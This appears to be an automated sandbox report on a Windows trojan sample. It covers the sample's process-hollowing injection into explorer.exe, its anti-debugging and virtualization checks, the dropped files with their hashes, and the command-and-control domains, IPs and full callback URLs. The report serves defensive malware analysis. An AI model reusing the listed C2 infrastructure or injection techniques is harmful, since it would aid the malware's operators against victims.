Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API [1] | Path Interception | Process Injection [612] | Rootkit [1] | Credential API Hooking [1] | Security Software Discovery [141] | Remote Services | Credential API Hooking [1] | Exfiltration Over Other Network Medium | Encrypted Channel [1] | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot [1]
Default Accounts | Shared Modules [1] | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion [3] | LSASS Memory | Virtualization/Sandbox Evasion [3] | Remote Desktop Protocol | Archive Collected Data [1] | Exfiltration Over Bluetooth | Ingress Tool Transfer [1] | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection [612] | Security Account Manager | Process Discovery [2] | SMB/Windows Admin Shares | Clipboard Data [1] | Automated Exfiltration | Non-Application Layer Protocol [2] | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information [1] | NTDS | Remote System Discovery [1] | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol [12] | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information [3] | LSA Secrets | System Network Configuration Discovery [1] | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing [11] | Cached Domain Credentials | System Network Connections Discovery [1] | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery [2] | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery [12] | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

Behavior Graph

Behavior Graph ID: 383918 | Sample: Y4U48592345670954.exe | Start date: 08/04/2021 | Architecture: WINDOWS | Score: 100

Signatures on the start node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 5 other signatures

Process tree as drawn in the graph (the original is an image; only its text survives):

- Y4U48592345670954.exe (started)
  dropped: C:\Users\user\AppData\...\yow0w7y8ovyw.dll, PE32
  signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Contains functionality to prevent local Windows debugging
  - Y4U48592345670954.exe (started)
    signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    - explorer.exe (injected)
      DNS/IP: www.contecoliving.com 69.163.220.52:80 (local port 49760), DREAMHOST-AS, US, United States; www.tententacleshydro.com; 5 other IPs or domains
      signatures: System process connects to network (likely due to code injection or exploit); Uses netstat to query active network connections and open ports
      - NETSTAT.EXE (started)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        - cmd.exe (started, 1 signature)
          - conhost.exe (started)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
Y4U48592345670954.exe | 17% | Virustotal |
Y4U48592345670954.exe | 17% | ReversingLabs | Win32.Trojan.Injexa

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll | 6% | ReversingLabs |

Unpacked PE Files

Source | Detection | Scanner | Label
2.1.Y4U48592345670954.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
4.2.NETSTAT.EXE.32fe660.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
2.2.Y4U48592345670954.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
4.2.NETSTAT.EXE.3d6f834.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.Y4U48592345670954.exe.2850000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

Domains

Source | Detection | Scanner
tententacleshydro.com | 4% | Virustotal
www.contecoliving.com | 0% | Virustotal
constipationhub.com | 0% | Virustotal

URLs

Source | Detection | Scanner | Label
https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w | 100% | Avira URL Cloud | malware
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
www.middlehambooks.com/klf/ | 0% | Avira URL Cloud | safe
http://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D | 100% | Avira URL Cloud | malware
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.tententacleshydro.com/klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up | 100% | Avira URL Cloud | malware
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.identityofplace.com/klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Up | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.constipationhub.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ8 | 0% | Avira URL Cloud | safe

The font-vendor and licence URLs in this table are strings carried by explorer.exe's own memory (font metadata), not contacts made by the sample; the report lists each of them three times, once per URL Reputation lookup, and they are shown once here.

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
tententacleshydro.com | 34.102.136.180 | true | false | | unknown
www.contecoliving.com | 69.163.220.52 | true | true | | unknown
constipationhub.com | 34.102.136.180 | true | false | | unknown
identityofplace.com | 34.102.136.180 | true | false | | unknown
www.identityofplace.com | unknown | unknown | true | | unknown
www.tententacleshydro.com | unknown | unknown | true | | unknown
www.constipationhub.com | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
www.middlehambooks.com/klf/ | true | Avira URL Cloud: safe | low
http://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D | true | Avira URL Cloud: malware | unknown
http://www.tententacleshydro.com/klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up | false | Avira URL Cloud: malware | unknown
http://www.identityofplace.com/klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Up | false | Avira URL Cloud: safe | unknown
http://www.constipationhub.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ8 | false | Avira URL Cloud: safe | unknown

                  URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designersG | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w | NETSTAT.EXE, 00000004.00000002.915537693.000000000425F000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.tiro.com | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.goodfont.co.kr | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.%s.comPA | explorer.exe, 00000003.00000002.915663862.0000000002B50000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://www.fonts.com | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | | high
http://www.sandoll.co.kr | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown

                                      Contacted IPs


                                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
34.102.136.180 | tententacleshydro.com | United States | 15169 | GOOGLEUS | false
69.163.220.52 | www.contecoliving.com | United States | 26347 | DREAMHOST-ASUS | true

                                      General Information

                                      Joe Sandbox Version:31.0.0 Emerald
                                      Analysis ID:383918
                                      Start date:08.04.2021
                                      Start time:12:25:53
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 9m 26s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:Y4U48592345670954.exe
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                      Number of analysed new started processes analysed:17
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:1
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@7/3@4/2
                                      EGA Information:Failed
                                      HDC Information:
                                      • Successful, ratio: 27.9% (good quality ratio 25.5%)
                                      • Quality average: 74.3%
                                      • Quality standard deviation: 30.9%
                                      HCA Information:
                                      • Successful, ratio: 92%
                                      • Number of executed functions: 88
                                      • Number of non-executed functions: 62
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .exe
                                      Warnings:
                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                      • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 52.255.188.83, 104.43.139.144, 13.88.21.125, 20.82.210.154, 104.42.151.234, 52.155.217.156, 20.54.26.129, 23.10.249.26, 23.10.249.43, 20.82.209.183
                                      • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASN

Match | Associated Sample Name / URL | Detection | Context
DREAMHOST-ASUS | invoice.exe | malicious | 69.163.228.164
DREAMHOST-ASUS | 56_012021.doc | malicious | 208.97.151.226
DREAMHOST-ASUS | sample.exe | malicious | 173.236.229.64
DREAMHOST-ASUS | ARBmDNJS7m.exe | malicious | 208.113.205.238
DREAMHOST-ASUS | New _Items.Xlsx.Pdf.exe | malicious | 66.33.222.0
DREAMHOST-ASUS | Payment TT Copy. PDF.exe | malicious | 66.33.222.0
DREAMHOST-ASUS | 4849708PO # RMS0001.exe | malicious | 69.163.228.230
DREAMHOST-ASUS | eogHAzg03I.exe | malicious | 67.205.11.26
DREAMHOST-ASUS | purchase order#034.exe | malicious | 69.163.228.230
DREAMHOST-ASUS | BSG_ptf.exe | malicious | 69.163.167.164
DREAMHOST-ASUS | nxHN51lQwj.exe | malicious | 69.163.225.40
DREAMHOST-ASUS | kw8VTJCVE6.exe | malicious | 69.163.225.40
DREAMHOST-ASUS | 9JZ1Nq9jXa.exe | malicious | 69.163.225.40
DREAMHOST-ASUS | RFQ 204871 AGC_pdf.exe | malicious | 69.163.167.164
DREAMHOST-ASUS | RAQ11986.exe | malicious | 69.163.225.47
DREAMHOST-ASUS | ORDER LIST.xlsx | malicious | 173.236.158.78
DREAMHOST-ASUS | swift copy pdf.exe | malicious | 173.236.165.225
DREAMHOST-ASUS | Inquiry pdf.exe | malicious | 173.236.165.225
DREAMHOST-ASUS | SHIPPING DOCS.xlsx | malicious | 69.163.157.222
DREAMHOST-ASUS | RFQ SECO WARWICK Germany.doc | malicious | 173.236.190.98

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Temp\3kusvrc50ywls0rc
                                      Process:C:\Users\user\Desktop\Y4U48592345670954.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):185856
                                      Entropy (8bit):7.999086744314393
                                      Encrypted:true
                                      SSDEEP:3072:DJrpwn8nX8cVji9mN7vyqjC2Hw1cfy6VPbPixK3gf+HiL1mVURAZkylpmbkxQFGh:rDX8Ai9mv9eMy6VP+xNYkm0spiNGh
                                      MD5:04F2CCB649106E4B8403BA47BF0B161D
                                      SHA1:D686FB1081635869059CE0034FD1EDD0A01E35E7
                                      SHA-256:D60A87D9CE46455806CDE5F3A8515DF1A515C9062139C76D14BF75BEAECAD527
                                      SHA-512:12999CFF3B8442865DFC09508CF13F4829A279172EB8A85E5D92889C297894AEE0EAAB04149958D952C17CB9AD8F7816EE9DD6BCD758CD7D59D69441F4AC859F
                                      Malicious:false
                                      Reputation:low
                                      Preview: .....=.3m.y..".RO7]..^.i..0...l.M..?.......f.UkZod..Zg@3......U...u...E<./..+.@6.../...XP.f...^GO...aA#jO.~.="g(.f....Tk......Q.^[L.9...}.......E..]9...?ro.0fFi..o..?. ..R...m....Vr..?.1..htVEJ...-..q....'i..D.d.(...K.A..z;...."..jX..y.qw.P"<....I..*\.)..6........'.....@...m...9..]V......)M.D38..1.w.h^..T.K.P.....UM.,Z..Ds.y.....I..s.h`;S...I....Y.mK7...4..2.}]./..>c!.~D........4.V...J...L..2.j.....o..h..R`..#.J.....n!....G.L.z..r.Y.......<s.M.[.....<X..=.+....D2....z...}.......3......(.>H..%O..;x....p...H...{.E..F.1.L..?Ld..Q....g{.+.h%.^4@...V.3._..pa@s...u...-.h...i,.#-...u...v..e-..3...Vk.=f8$,.K.a...O..fShD.J.T..{9.....88a.......O../X..D5*....W7.F..&W...w..........v.T.}I&.XT]..... .T.g[.}>)%Q....V..N....Z.Y..)~W.Z....>....g..]dA...'...T\.e..*..Y.-S.s._.y3..:....r......@.v]9.p'...&..@...x..D>u#.>.%.jO..\...<..4..K..@..Q.W......9..[cO.j/...Y.dX.B.r..A.nk.c.>.&..,_....H]...P+s7....^n..Eg.*o.(...X.;.b{H$>...7.f..R.....pK.:R{.......T^<.tJ
                                      C:\Users\user\AppData\Local\Temp\nskA2DD.tmp\yow0w7y8ovyw.dll
                                      Process:C:\Users\user\Desktop\Y4U48592345670954.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4096
                                      Entropy (8bit):4.1271255992731
                                      Encrypted:false
                                      SSDEEP:48:vpghendHRWgTJzDrscX/oh/jTLNuLebdsbriB4ZYmRz:BYIWcxtXghrnktfiuZVR
                                      MD5:823D8D2962EF7A632F256759B088FFF8
                                      SHA1:263245E0C8D9EF7FACDE174BE1CEE3FAA9A846BA
                                      SHA-256:7DDF5362A2603771F85D4CE7341B647FE839005820F52C47B3391D38F839E89F
                                      SHA-512:6563CA17DE1820B7DED3D39B106D0C0FB4C8BBC3EF2A5B88DDBD30FA8C2A4CBDB521D5C6960281B930BAA126F2FE637CB605ECA2EC4C3709AD16AC63E2B3D3D2
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 6%
                                      Reputation:low
                                      Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...L.n`...........!.........................................................`............@.......................... ..U....!.......@.......................P..L...$ ..............................................("...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..L....P......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      C:\Users\user\AppData\Local\Temp\sn7trv7b4c9aukp2
                                      Process:C:\Users\user\Desktop\Y4U48592345670954.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6661
                                      Entropy (8bit):7.966207593101436
                                      Encrypted:false
                                      SSDEEP:192:qdeemJBzAS2B25DiXlBUrBKli0qLnnZAvAVnHd:SepQB2FSbUF6snZbVHd
                                      MD5:9C2EE18B684CD1990D6BB0140F48B8EF
                                      SHA1:D2AC6BFA52B3DB413E8FFEB941DA0A8CC6ABE263
                                      SHA-256:1723655FB6D497AC55E316181F4243F8CF2D49578C714F8997DAC9966D71659E
                                      SHA-512:BC5DAF45130DB66C1E5A86880F3F3B49E9313F14B10C165FBC87A5702014B668AE7559D4B1958F7CF41941B6B6DF674E15C78379B607CC600C4B007CC4368C14
                                      Malicious:false
                                      Reputation:low
                                      Preview: ...I|..Q...p.P....W.....b..vc........j. .T?..Rg.k..+.gWC.c.[.3..s.`.X.0.n.oeM].5.{.|2Yj..BSx../-g..?Y}.~<d4..LW...A.9...]...>.6...kT.MK.C....Y.ZH...#..V.W.... ..c.d.8..-..`.i......e...%.t.4..M.*.y..1....'y...6..|.t~...C...q....@.#j...&L.M.p{..sU.~.~P......zV....W.....y_.P.T^..PP.N..h.vR[m.3.[.U.adY.Q<.^.d...._9.k.c.;Uy.zhf`..8cv.w-:e..=i...:.2..Jg...7./..G-...D8<...;R.SIKA...AO.PFL>....\.U./K....a.b....+..^._....(..k.l...#.r..2.MT..p.../-...\.g.;<......78....BC..A....?..=.AJ...M..)A.2w.:.M.,....qQ...F..U..,....Y]...U..+....,'..l.... U.N..+.!,.'4.lr.s./....h(.,.p..\ .=..0p.,.x..D0...0.[..~..|,S..G..8..V....,[.R....T..4.v.S...[."...G(N. .K..sM.g.^.+3.`..]e(m..q..w..3.oo=5...*d.y,2...8y...6....9.....#....*>H........)mU...(zO.....[....r]...G..w..0..YH.....6.T_..Y.J....)...fVD...>3..(r.u..u./%q.nW.pp.....Ur.xw..c.....J.eL.~...6.7.7...Q.......:....T...O.P...U....U.".UW.dabb...bd.G.._...i....gf..4.....~4..qP..1...n<.=...B..B.B.

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.919280210748743
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 92.16%
                                      • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:Y4U48592345670954.exe
                                      File size:227550
                                      MD5:e8e69391d3a931e6638adaebf6a339f6
                                      SHA1:29c02e786c6f8b343bc0f05a1195ff5215d21e63
                                      SHA256:20087dfd9482120735e4e37edc7307b91264632b0c9c7b50a058c100ba186ece
                                      SHA512:da123a74a0e598d6d1e1886d18a1141da3ea6403e03984e01a2ffc76723ccc3837cf8dc652bbeae2e435278e321a9b31ed434a79215a6b67fe7c81524b1fde5e
                                      SSDEEP:6144:HdliJDX8Ai9mv9eMy6VP+xNYkm0spiNGU:jiB8AiEVeJF
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z....9.....J1.....

                                      File Icon

                                      Icon Hash:b2a88c96b2ca6a72

                                      Static PE Info

                                      General

                                      Entrypoint:0x40314a
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                      DLL Characteristics:
                                      Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                      Entrypoint Preview

                                      Instruction
                                      sub esp, 0000017Ch
                                      push ebx
                                      push ebp
                                      push esi
                                      xor esi, esi
                                      push edi
                                      mov dword ptr [esp+18h], esi
                                      mov ebp, 00409240h
                                      mov byte ptr [esp+10h], 00000020h
                                      call dword ptr [00407030h]
                                      push esi
                                      call dword ptr [00407270h]
                                      mov dword ptr [007A3030h], eax
                                      push esi
                                      lea eax, dword ptr [esp+30h]
                                      push 00000160h
                                      push eax
                                      push esi
                                      push 0079E540h
                                      call dword ptr [00407158h]
                                      push 00409230h
                                      push 007A2780h
                                      call 00007FA960977D68h
                                      mov ebx, 007AA400h
                                      push ebx
                                      push 00000400h
                                      call dword ptr [004070B4h]
                                      call 00007FA9609754A9h
                                      test eax, eax
                                      jne 00007FA960975566h
                                      push 000003FBh
                                      push ebx
                                      call dword ptr [004070B0h]
                                      push 00409228h
                                      push ebx
                                      call 00007FA960977D53h
                                      call 00007FA960975489h
                                      test eax, eax
                                      je 00007FA960975682h
                                      mov edi, 007A9000h
                                      push edi
                                      call dword ptr [00407140h]
                                      call dword ptr [004070ACh]
                                      push eax
                                      push edi
                                      call 00007FA960977D11h
                                      push 00000000h
                                      call dword ptr [00407108h]
                                      cmp byte ptr [007A9000h], 00000022h
                                      mov dword ptr [007A2F80h], eax
                                      mov eax, edi
                                      jne 00007FA96097554Ch
                                      mov byte ptr [esp+10h], 00000022h
                                      mov eax, 00000001h

                                      Rich Headers

                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804

                                      Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7344 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3ac000 | 0x900 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x280 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                      Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x59de | 0x5a00 | False | 0.681293402778 | data | 6.5143386598 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x10f2 | 0x1200 | False | 0.430338541667 | data | 5.0554281206 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x39a034 | 0x400 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x3a4000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x3ac000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94574916515 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                      Resources

                                      Name | RVA | Size | Type | Language | Country
                                      RT_ICON | 0x3ac190 | 0x2e8 | data | English | United States
